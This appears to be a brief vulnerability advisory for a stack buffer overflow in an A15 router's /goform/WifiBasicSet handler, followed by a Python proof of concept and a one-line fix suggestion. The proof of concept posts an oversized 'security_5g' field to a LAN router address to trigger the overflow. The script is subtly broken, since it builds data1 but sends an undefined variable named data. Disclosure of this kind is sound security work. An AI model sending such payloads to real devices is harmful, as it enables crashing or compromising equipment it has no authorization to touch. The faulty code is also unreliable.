We found a stack buffer overflow vulnerability at **A15 (**Firmware version V15.13.07.13).
In the handler function for action /goform/WifiBasicSet, the user-controlled string “security_5g” is copied to a stack buffer param_5g without size check, resulting in buffer overflow.
import requests
cookie = {"Cookie":"uid=1234"}
url1 = "<http://192.168.17.221:80/goform/WifiBasicSet>"
data1 = {"security_5g" : "a"*(0x1000)}
response = requests.post(url1, cookies=cookie, data=data)
print(response.text)
print(response)
Use strncpy to avoid buffer overflow.